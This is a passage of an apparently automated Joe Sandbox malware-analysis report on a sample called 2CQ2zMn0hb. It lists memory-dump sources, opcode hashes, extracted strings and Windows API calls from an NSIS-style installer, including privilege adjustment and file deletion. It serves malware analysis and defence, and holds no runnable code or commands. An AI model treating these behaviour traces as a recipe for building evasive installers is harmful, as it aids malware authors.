                                                                                                              • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 907834e5f2697bdf80fb02976c3f3077b5664ce354fe8de78e557b8f2f492320
                                                                                                              • Instruction ID: 6148f239e367e6c5665b073a445dba769ac26e997926a720b5cd4f45026c8301
                                                                                                              • Opcode Fuzzy Hash: 907834e5f2697bdf80fb02976c3f3077b5664ce354fe8de78e557b8f2f492320
                                                                                                              • Instruction Fuzzy Hash: 55D0C27080A249DFC7018B64A8056A8FB74AB03301F0011E9D40863153D7310D65D345
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 56016ad6dcb826f90630b7ae28ae88cf979ab9c1716334ba9134b44c53c8d009
                                                                                                              • Instruction ID: 7175f93dfced039e1485a0ce395070a39b2b830203c975f64dbc6ca8e3034f4a
                                                                                                              • Opcode Fuzzy Hash: 56016ad6dcb826f90630b7ae28ae88cf979ab9c1716334ba9134b44c53c8d009
                                                                                                              • Instruction Fuzzy Hash: 8DD05E3A20C2804FC7128634E8524D87F705F5322471552EAD085DBE73C152984A8712
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 41a3cee89e4b02ad46918cc2b0ea360952efa102c6ca3d55abb699544a059df2
                                                                                                              • Instruction ID: 7d03a92592bebe46182e45fbaa52231fbc794685a16fce879e8856025824bffb
                                                                                                              • Opcode Fuzzy Hash: 41a3cee89e4b02ad46918cc2b0ea360952efa102c6ca3d55abb699544a059df2
                                                                                                              • Instruction Fuzzy Hash: 63D0C23554C3444FC607DB36BD905867B6B9F802007209131D0010E67EDE346A8BD760
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 98d044501cd76fc58cfcbaa0f9807dec41eadfedaf6e6f1d1c5dfa5e7473a23f
                                                                                                              • Instruction ID: 590c2203edc1a918e7fb080a495e9cd88ef9e23068de27cb43a7a2742a3d155d
                                                                                                              • Opcode Fuzzy Hash: 98d044501cd76fc58cfcbaa0f9807dec41eadfedaf6e6f1d1c5dfa5e7473a23f
                                                                                                              • Instruction Fuzzy Hash: 9ED05B2114E7900FD71682287814D596F754EC761070545E6E048CB1E596850A498746
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 817bb52a4a8189b0fc4ec7726e83cec88e7308417f86d399926eb195dcb20a72
                                                                                                              • Instruction ID: ac3eacb7c8d8f0a4ede675a5c42f927971ab596706c5bb73d2a8530ebe803afd
                                                                                                              • Opcode Fuzzy Hash: 817bb52a4a8189b0fc4ec7726e83cec88e7308417f86d399926eb195dcb20a72
                                                                                                              • Instruction Fuzzy Hash: 4DD0673AB40018AFCB049F98EC808DDFB76FB98221B048116F915A3261C6319965DB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c90cd19333f1628959c647489ebf848e513f5d7d2d7257ced905ecc1f8595dbe
                                                                                                              • Instruction ID: 1bf903b3baa514c82a212c700239117bc844564cbc2a767c7676e4bf22c1e724
                                                                                                              • Opcode Fuzzy Hash: c90cd19333f1628959c647489ebf848e513f5d7d2d7257ced905ecc1f8595dbe
                                                                                                              • Instruction Fuzzy Hash: 68D0C970C16209DFC744DBA8E805AA9B779EB47312F4051A8A40863251DB715D24D699
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 237a6c65cb6597b178e1da6143b673880caca4c6ef0bdd5ab648e37b70c76dd3
                                                                                                              • Instruction ID: 316465bdd26eb977b61de559d063b265072fe45edf00721e8988ea94df249d65
                                                                                                              • Opcode Fuzzy Hash: 237a6c65cb6597b178e1da6143b673880caca4c6ef0bdd5ab648e37b70c76dd3
                                                                                                              • Instruction Fuzzy Hash: 84C08033247610176718A21CB490D9E565DCDC5711F10DD77F004D71384E549D4FC5C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 88c5ac78e8fe560aa8e1ccb03bf461ceca8478cd778783c87ce8a6186f7a61af
                                                                                                              • Instruction ID: 463e292bc8bff3669562f3bfd7f3d82aac4589c5acca9fc18a93aa920c9d13ae
                                                                                                              • Opcode Fuzzy Hash: 88c5ac78e8fe560aa8e1ccb03bf461ceca8478cd778783c87ce8a6186f7a61af
                                                                                                              • Instruction Fuzzy Hash: 50C08C74012E098BF2042F60BC1CB79B7B8F707323FC82D10E00D02831CBB89424CA49
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bf33dc7308c806959f64cbe75d4be926939a59b9e2ec5dd66451bcda57329a84
                                                                                                              • Instruction ID: f7cab79f8a3251fce1559d3a464ea52c5353b972f3e0ff67f18721c515469851
                                                                                                              • Opcode Fuzzy Hash: bf33dc7308c806959f64cbe75d4be926939a59b9e2ec5dd66451bcda57329a84
                                                                                                              • Instruction Fuzzy Hash: 78C012300543084EC549EF6AFE45A55B72EAF802047608530A0060657EEFB8694A8BD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 16ba1ae4fc0e9a3532310465cf7635fca34d82a4f8756fc4a2c3478087865d44
                                                                                                              • Instruction ID: 926618641c6f00c603d0129f7d9a7374ce87f9b85d22960229c3190719b9e069
                                                                                                              • Opcode Fuzzy Hash: 16ba1ae4fc0e9a3532310465cf7635fca34d82a4f8756fc4a2c3478087865d44
                                                                                                              • Instruction Fuzzy Hash: 61C08C303A82048FE200AA1DCA94A2133ACEF85B04F2018E0F1048B675CB22FC008A04
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2a5018dc5a17c4bf77f37e82bfb5e59cef994a5d82b5d16eead181e0041ddb23
                                                                                                              • Instruction ID: b2b87759b1612eb36ff0347e2001e0bdd41346efa6db2734f629ce2a197ba042
                                                                                                              • Opcode Fuzzy Hash: 2a5018dc5a17c4bf77f37e82bfb5e59cef994a5d82b5d16eead181e0041ddb23
                                                                                                              • Instruction Fuzzy Hash: 5EA0223C300002C3C308EB28E000C0FF3832FE0A08B00C02C0008030E08820CC028023
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                              • GetVersion.KERNEL32 ref: 004034CE
                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                              • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                              • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                              • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                              • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                              • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                              • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                              • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                              • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                              • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                              • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                              • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                              • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                              • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                              • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                              • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                              • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                              • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                              • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                              • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                              • API String ID: 3441113951-334447862
                                                                                                              • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                              • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                              • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                              • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                              • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                              • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                              • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N
                                                                                                              • API String ID: 1638840714-813528018
                                                                                                              • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                              • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                              • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                              • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "$0o@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                              • API String ID: 0-1947560563
                                                                                                              • Opcode ID: 2a489e6f05ee0c53d5c79a742a6b2f552e574f7b7490a6acc47d931b8f8600de
                                                                                                              • Instruction ID: 32e3285ae1a7d71a65449d00ada0b292211a5ddbaca89ce7ac430efd131befc1
                                                                                                              • Opcode Fuzzy Hash: 2a489e6f05ee0c53d5c79a742a6b2f552e574f7b7490a6acc47d931b8f8600de
                                                                                                              • Instruction Fuzzy Hash: 3F32AE74E012188FEB54CF69C994B9DBBB2BF89310F1080E9D809A7365DB75AE85CF14
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNEL32(?,?,00437800,75922EE0,00000000), ref: 00405B23
                                                                                                              • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,75922EE0,00000000), ref: 00405B6B
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,75922EE0,00000000), ref: 00405B8E
                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,75922EE0,00000000), ref: 00405B94
                                                                                                              • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,75922EE0,00000000), ref: 00405BA4
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                              • String ID: 0WB$\*.*
                                                                                                              • API String ID: 2035342205-351390296
                                                                                                              • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                              • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                              • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                              • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "$0o@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                              • API String ID: 0-455001714
                                                                                                              • Opcode ID: 812c4c646515aecdb9f9335c34763d6ef558fe69e125c895d2658d3e2a0ea366
                                                                                                              • Instruction ID: 1ebfde536435c1dc03bf2e4792db1e48e36851784aff5f7056cfd2caa3f9e31e
                                                                                                              • Opcode Fuzzy Hash: 812c4c646515aecdb9f9335c34763d6ef558fe69e125c895d2658d3e2a0ea366
                                                                                                              • Instruction Fuzzy Hash: C802A1B4E012188FEB58CF65D994B9DBBB2BF89300F1081A9D409A7365DB355E85CF10
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "$0o@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                              • API String ID: 0-455001714
                                                                                                              • Opcode ID: 8e50a63897e80f05efcb1ecb6a23ea8816b4656077ea804638e26436b1b3245d
                                                                                                              • Instruction ID: 6836fcc2ea39efc05ec3a5d36b56d9482f576aef85521eff2e297d9bfcd1c4ed
                                                                                                              • Opcode Fuzzy Hash: 8e50a63897e80f05efcb1ecb6a23ea8816b4656077ea804638e26436b1b3245d
                                                                                                              • Instruction Fuzzy Hash: 2302A1B4E012188FEB58CF69D994BDDBBB2BF49300F1081A9D409A7365DB35AE85CF14
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                              • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0), ref: 00406736
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID: xgB
                                                                                                              • API String ID: 2295610775-399326502
                                                                                                              • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                              • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .5uq$B7
                                                                                                              • API String ID: 0-2069553828
                                                                                                              • Opcode ID: b0f246df3fa03783a52e5e184d8fb689bd693e4999207f500b764f67b9a82465
                                                                                                              • Instruction ID: 115da7e5bc7a5711ba8b755b142ca2c688d4581177cfa8d9df3651dc25894b05
                                                                                                              • Opcode Fuzzy Hash: b0f246df3fa03783a52e5e184d8fb689bd693e4999207f500b764f67b9a82465
                                                                                                              • Instruction Fuzzy Hash: C462AC74A01229CFDB64DF65C890BDDBBB2BF89301F1085E9D409A7265DB35AE82CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
